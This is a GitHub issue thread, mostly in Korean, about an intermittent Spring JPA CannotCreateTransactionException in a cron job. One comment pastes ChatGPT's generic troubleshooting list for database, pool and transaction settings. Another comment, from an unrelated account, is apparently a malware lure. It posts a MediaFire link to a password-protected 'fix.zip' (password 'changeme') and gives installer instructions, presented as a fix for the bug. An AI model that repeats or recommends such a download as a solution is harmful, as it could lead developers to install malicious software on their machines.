### ISSUE TITLE
[Spring-production-mysql-크론잡] CannotCreateTransactionException - Could not open JPA EntityManager for transaction

### ISSUE THREAD

**Issue by Lcrescent3es** [100-hours-a-week/5-team-HRTH-ustock-be#104]
##  버그 설명

버그에 대한 명확하고 간결한 설명해주세요.

- StockCronService 크론잡 도중 발생
Event ID:
a43bb121
Aug 28, 5:18 AM
실제 발생 시각: 14:18

## 재현하는 방법

동작을 재현하는 단계:

1. 크론잡 도중 간헐적으로 발생하는 현상

## 예상한 동작

예상했던 일에 대한 명확하고 간결한 설명해주세요.

- 정상작동

## 스크린샷 (옵션)

[센트리](https://ustock-p0.sentry.io/issues/5765702870/?project=4507837264035840&query=is%3Aunresolved+issue.priority%3A%5Bhigh%2C+medium%5D&referrer=issue-stream&stream_index=2)

## 데스크톱(다음 정보를 작성해 주세요):

- OS: MacOS(M1)
- Browser Chrome

## 추가적인 내용 (옵션):

여기에 문제에 대한 다른 컨텍스트를 추가해주세요.

**Comment by Lcrescent3es** [comment]
chatGPT
일반적인 원인
데이터베이스 연결 문제

데이터베이스가 다운되었거나, 네트워크 문제로 인해 데이터베이스에 연결할 수 없을 때 발생할 수 있습니다.
잘못된 데이터베이스 URL, 사용자 이름, 비밀번호 등으로 인해 데이터베이스 연결이 실패할 수 있습니다.
잘못된 트랜잭션 설정

Spring의 트랜잭션 설정이 올바르지 않거나, 트랜잭션 매니저가 잘못 구성된 경우 발생할 수 있습니다.
JPA에서 EntityManager를 생성하는 동안 트랜잭션이 적절하게 시작되지 않았을 수 있습니다.
데이터베이스 풀 문제

데이터베이스 연결 풀이 가득 차서 새로운 연결을 생성할 수 없는 경우 발생할 수 있습니다.
연결이 제대로 반환되지 않거나, 풀 크기가 너무 작게 설정되어 있을 수 있습니다.
데이터베이스 시간 초과

데이터베이스 서버의 응답 시간이 너무 길어 트랜잭션 생성이 시간 초과로 실패할 수 있습니다.
해결 방법
데이터베이스 연결 확인

데이터베이스 서버가 실행 중인지, 네트워크 연결이 정상인지 확인합니다.
데이터베이스 URL, 사용자 이름, 비밀번호 등이 정확하게 설정되었는지 확인합니다.
트랜잭션 관리 설정 확인

@Transactional 어노테이션이 적절하게 적용되었는지, 트랜잭션 매니저가 제대로 구성되어 있는지 확인합니다.
Spring에서 사용되는 트랜잭션 매니저(DataSourceTransactionManager, JpaTransactionManager 등)가 올바르게 설정되었는지 확인합니다.
데이터베이스 연결 풀 설정 조정

연결 풀의 크기를 확인하고, 필요에 따라 조정합니다. 예를 들어, maxActive, maxIdle, minIdle 등의 설정을 점검합니다.
사용하는 연결 풀에 대해 타임아웃 설정을 점검하고, 필요하다면 타임아웃 시간을 늘리거나 풀 크기를 조정합니다.
로그 확인

예외가 발생할 때의 로그를 확인하여, 예외가 발생하기 전후의 상세 로그를 분석합니다.
데이터베이스 연결 관련 오류나 트랜잭션 매니저와 관련된 오류를 확인합니다.

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Lcrescent3es** [comment]
#116 과 같은 오류, close
